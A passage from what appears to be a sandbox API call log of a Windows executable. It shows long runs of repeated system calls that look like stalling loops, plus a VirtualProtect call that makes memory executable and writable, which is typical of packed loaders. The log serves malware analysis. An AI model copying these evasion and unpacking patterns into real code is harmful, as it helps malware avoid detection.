| out: lpCPInfo=0x18fa80) returned 1 [0044.003] GetACP () returned 0x4e4 [0044.003] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.003] GetACP () returned 0x4e4 [0044.003] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.003] GetACP () returned 0x4e4 [0044.003] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.003] GetACP () returned 0x4e4 [0044.003] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.003] GetACP () returned 0x4e4 [0044.003] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.003] GetACP () returned 0x4e4 [0044.003] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.003] GetACP () returned 0x4e4 [0044.003] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.004] GetACP () returned 0x4e4 [0044.004] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.004] GetACP () returned 0x4e4 [0044.004] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.004] GetACP () returned 0x4e4 [0044.004] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.004] GetACP () returned 0x4e4 [0044.004] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.004] GetACP () returned 0x4e4 [0044.004] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.004] GetACP () returned 0x4e4 [0044.004] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.004] GetACP () returned 0x4e4 [0044.004] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.004] GetACP () returned 0x4e4 [0044.004] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.004] GetACP () returned 0x4e4 [0044.004] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.004] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.004] GetACP () returned 0x4e4 [0044.005] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.005] GetACP () returned 0x4e4 [0044.005] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.005] GetACP () returned 0x4e4 [0044.005] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.005] GetACP () returned 0x4e4 [0044.005] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.005] GetACP () returned 0x4e4 [0044.005] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.005] GetACP () returned 0x4e4 [0044.005] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.005] GetACP () returned 0x4e4 [0044.005] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.005] GetACP () returned 0x4e4 [0044.005] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.005] GetACP () returned 0x4e4 [0044.005] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.005] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.005] GetACP () returned 0x4e4 [0044.005] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.006] GetACP () returned 0x4e4 [0044.006] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.006] GetACP () returned 0x4e4 [0044.006] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.006] GetACP () returned 0x4e4 [0044.006] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.006] GetACP () returned 0x4e4 [0044.006] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.006] GetACP () returned 0x4e4 [0044.006] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.006] GetACP () returned 0x4e4 [0044.006] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.006] GetACP () returned 0x4e4 [0044.006] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.006] GetACP () returned 0x4e4 [0044.006] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.006] GetACP () returned 0x4e4 [0044.006] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.006] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.006] GetACP () returned 0x4e4 [0044.007] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.007] GetACP () returned 0x4e4 [0044.007] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.007] GetACP () returned 0x4e4 [0044.007] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.007] GetACP () returned 0x4e4 [0044.007] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.007] GetACP () returned 0x4e4 [0044.007] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.007] GetACP () returned 0x4e4 [0044.007] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.007] GetACP () returned 0x4e4 [0044.007] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.007] GetACP () returned 0x4e4 [0044.007] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.007] GetACP () returned 0x4e4 [0044.007] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.007] GetACP () returned 0x4e4 [0044.294] VirtualProtect (in: lpAddress=0x4e5ab8, dwSize=0xf540, flNewProtect=0x40, lpflOldProtect=0x43b444 | out: lpflOldProtect=0x43b444*=0x4) returned 1 [0044.295] AddAtomA (lpString=0x0) returned 0x0 [0044.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.295] AddAtomA (lpString=0x0) returned 0x0 [0044.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.295] AddAtomA (lpString=0x0) returned 0x0 [0044.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.295] AddAtomA (lpString=0x0) returned 0x0 [0044.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.295] AddAtomA (lpString=0x0) returned 0x0 [0044.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.295] AddAtomA (lpString=0x0) returned 0x0 [0044.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.295] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.295] AddAtomA (lpString=0x0) returned 0x0 [0044.295] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.296] AddAtomA (lpString=0x0) returned 0x0 [0044.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.296] AddAtomA (lpString=0x0) returned 0x0 [0044.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.296] AddAtomA (lpString=0x0) returned 0x0 [0044.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.296] AddAtomA (lpString=0x0) returned 0x0 [0044.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.296] AddAtomA (lpString=0x0) returned 0x0 [0044.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.296] AddAtomA (lpString=0x0) returned 0x0 [0044.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.296] AddAtomA (lpString=0x0) returned 0x0 [0044.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.296] AddAtomA (lpString=0x0) returned 0x0 [0044.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.296] AddAtomA (lpString=0x0) returned 0x0 [0044.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.296] AddAtomA (lpString=0x0) returned 0x0 [0044.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.296] AddAtomA (lpString=0x0) returned 0x0 [0044.296] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.296] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.296] AddAtomA (lpString=0x0) returned 0x0 [0044.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.297] AddAtomA (lpString=0x0) returned 0x0 [0044.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.297] AddAtomA (lpString=0x0) returned 0x0 [0044.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.297] AddAtomA (lpString=0x0) returned 0x0 [0044.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.297] AddAtomA (lpString=0x0) returned 0x0 [0044.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.297] AddAtomA (lpString=0x0) returned 0x0 [0044.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.297] AddAtomA (lpString=0x0) returned 0x0 [0044.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.297] AddAtomA (lpString=0x0) returned 0x0 [0044.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.297] AddAtomA (lpString=0x0) returned 0x0 [0044.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.297] AddAtomA (lpString=0x0) returned 0x0 [0044.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.297] AddAtomA (lpString=0x0) returned 0x0 [0044.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.297] AddAtomA (lpString=0x0) returned 0x0 [0044.297] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.297] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.300] AddAtomA (lpString=0x0) returned 0x0 [0044.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.300] AddAtomA (lpString=0x0) returned 0x0 [0044.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.300] AddAtomA (lpString=0x0) returned 0x0 [0044.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.300] AddAtomA (lpString=0x0) returned 0x0 [0044.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.300] AddAtomA (lpString=0x0) returned 0x0 [0044.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.301] AddAtomA (lpString=0x0) returned 0x0 [0044.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.301] AddAtomA (lpString=0x0) returned 0x0 [0044.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.301] AddAtomA (lpString=0x0) returned 0x0 [0044.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.301] AddAtomA (lpString=0x0) returned 0x0 [0044.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.301] AddAtomA (lpString=0x0) returned 0x0 [0044.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.301] AddAtomA (lpString=0x0) returned 0x0 [0044.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.301] AddAtomA (lpString=0x0) returned 0x0 [0044.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.301] AddAtomA (lpString=0x0) returned 0x0 [0044.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.301] AddAtomA (lpString=0x0) returned 0x0 [0044.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.301] AddAtomA (lpString=0x0) returned 0x0 [0044.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.301] AddAtomA (lpString=0x0) returned 0x0 [0044.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.301] 